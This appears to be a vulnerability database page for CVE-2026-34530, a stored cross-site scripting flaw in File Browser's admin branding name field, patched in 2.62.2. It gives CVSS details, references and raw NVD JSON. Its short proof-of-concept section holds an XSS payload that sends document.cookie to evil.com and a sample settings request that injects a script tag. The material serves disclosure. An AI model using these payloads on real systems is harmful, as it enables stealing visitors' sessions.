Security Vulnerability Report
CVE-2026-34530 CVSS 6.9 MEDIUM

Published: 2026-04-01 21:17:01
Last Modified: 2026-04-06 20:34:22

Description

File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the SPA index page in File Browser is vulnerable to Stored Cross-Site Scripting (XSS) via admin-controlled branding fields. An admin who sets branding.name to a malicious payload injects persistent JavaScript that executes for ALL visitors, including unauthenticated users. This issue has been patched in version 2.62.2.

CVSS Details

CVSS Score
6.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:* - VULNERABLE
File Browser < 2.62.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
text
// PoC for CVE-2026-34530: Stored XSS via Branding Name
// Attacker needs Admin privileges to set the branding.name.
// Malicious Payload to inject:
// <img src=x onerror=fetch('https://evil.com/log?c='+document.cookie)>
// Example HTTP Request to update settings (Conceptual):
/*
PUT /api/settings HTTP/1.1
Host: target-filebrowser.com
Authorization: Bearer <ADMIN_TOKEN>
Content-Type: application/json

{
  "branding": {
    "name": "<script>console.log('XSS');alert(1)</script>"
  }
}
*/
// Upon visiting the homepage, the script executes for all users.

References

https://github.com/filebrowser/filebrowser/releases/tag/v2.62.2 (Product, Release Notes)
https://github.com/filebrowser/filebrowser/security/advisories/GHSA-xfqj-3vmx-63wv (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-34530",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-01T21:17:00.993",
    "lastModified": "2026-04-06T20:34:21.887",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the SPA index page in File Browser is vulnerable to Stored Cross-Site Scripting (XSS) via admin-controlled branding fields. An admin who sets branding.name to a malicious payload injects persistent JavaScript that executes for ALL visitors, including unauthenticated users. This issue has been patched in version 2.62.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N",
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.7,
          "impactScore": 4.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.62.2",
                "matchCriteriaId": "A22210FE-83DA-49B9-A015-543942FE731F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.62.2",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-xfqj-3vmx-63wv",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}